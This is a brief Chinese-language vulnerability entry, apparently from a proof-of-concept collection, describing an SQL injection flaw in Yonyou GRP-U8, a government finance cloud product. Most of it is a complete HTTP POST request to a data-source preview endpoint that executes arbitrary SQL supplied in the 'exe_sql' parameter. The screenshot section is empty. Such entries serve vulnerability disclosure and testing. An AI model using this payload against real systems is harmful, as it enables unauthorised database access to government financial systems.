Y16-22用友-GRP-U8-SQL

漏洞描述：

政府财务云存在SQL注入漏洞

漏洞复现：

payload：

POST /gla/dataSource/selectGlaDatasourcePreview HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 74

exe_sql=SELECT%2011*11&pageNumber=1&pageSize=10&exe_param=11,1,11,1,11,1

效果图：